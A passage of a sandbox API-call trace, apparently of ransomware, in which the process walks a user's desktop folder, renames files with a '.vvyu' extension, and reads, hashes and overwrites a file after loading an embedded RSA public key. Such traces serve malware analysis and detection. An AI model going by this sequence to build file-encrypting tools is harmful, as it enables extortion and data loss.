lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\v_uiD 9U5nghF.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\v_uid 9u5nghf.docx.vvyu")) returned 1 [0196.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.710] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0196.713] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2963c900, ftCreationTime.dwHighDateTime=0x1d896fc, ftLastAccessTime.dwLowDateTime=0x25d32590, ftLastAccessTime.dwHighDateTime=0x1d89eba, ftLastWriteTime.dwLowDateTime=0x25d32590, ftLastWriteTime.dwHighDateTime=0x1d89eba, nFileSizeHigh=0x0, nFileSizeLow=0x17824, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WXRqwImP8omimb.bmp", cAlternateFileName="WXRQWI~1.BMP")) returned 1 [0196.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0196.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edc48 [0196.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0196.713] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\WXRqwImP8omimb.bmp") returned=".bmp" [0196.713] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\WXRqwImP8omimb.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\wxrqwimp8omimb.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.714] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=96292) returned 1 [0196.714] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.718] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x177fe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.718] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.720] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.720] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x17824, lpOverlapped=0x0) returned 1 [0196.721] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.721] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.721] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.721] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0196.723] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0196.723] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.723] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.723] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.723] GetLastError () returned 0x0 [0196.723] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0196.723] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0196.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.723] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.723] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.723] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x17820) returned 0x2af5168 [0196.724] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0196.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea458 [0196.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6650 [0196.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea4a0 [0196.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6668 [0196.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6698 [0196.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66f8 [0196.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66b0 [0196.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.725] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0196.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6698 | out: hHeap=0x2c0000) returned 1 [0196.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66b0 | out: hHeap=0x2c0000) returned 1 [0196.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66f8 | out: hHeap=0x2c0000) returned 1 [0196.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66f8 [0196.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0196.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66b0 [0196.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6698 [0196.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0196.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0196.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0196.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66b0 | out: hHeap=0x2c0000) returned 1 [0196.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6698 | out: hHeap=0x2c0000) returned 1 [0196.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66f8 | out: hHeap=0x2c0000) returned 1 [0196.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0196.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0196.729] GetCurrentThreadId () returned 0x5d8 [0196.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0196.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2270 [0196.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0196.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0196.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.730] GetCurrentThreadId () returned 0x5d8 [0196.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0196.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66f8 [0196.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6698 [0196.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0196.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66b0 [0196.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6680 [0196.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6710 [0196.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0196.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66e0 [0196.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66c8 [0196.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6728 [0196.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66c8 | out: hHeap=0x2c0000) returned 1 [0196.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66c8 [0196.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66e0 | out: hHeap=0x2c0000) returned 1 [0196.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0196.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0196.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6698 | out: hHeap=0x2c0000) returned 1 [0196.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6698 [0196.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66f8 | out: hHeap=0x2c0000) returned 1 [0196.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6728 | out: hHeap=0x2c0000) returned 1 [0196.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6698 | out: hHeap=0x2c0000) returned 1 [0196.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0196.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66c8 | out: hHeap=0x2c0000) returned 1 [0196.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6710 | out: hHeap=0x2c0000) returned 1 [0196.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66b0 | out: hHeap=0x2c0000) returned 1 [0196.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6680 | out: hHeap=0x2c0000) returned 1 [0196.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0196.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6668 | out: hHeap=0x2c0000) returned 1 [0196.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea4a0 | out: hHeap=0x2c0000) returned 1 [0196.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0196.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.742] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x1781f, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x1781f, lpOverlapped=0x0) returned 1 [0196.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.744] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17824, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.744] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, 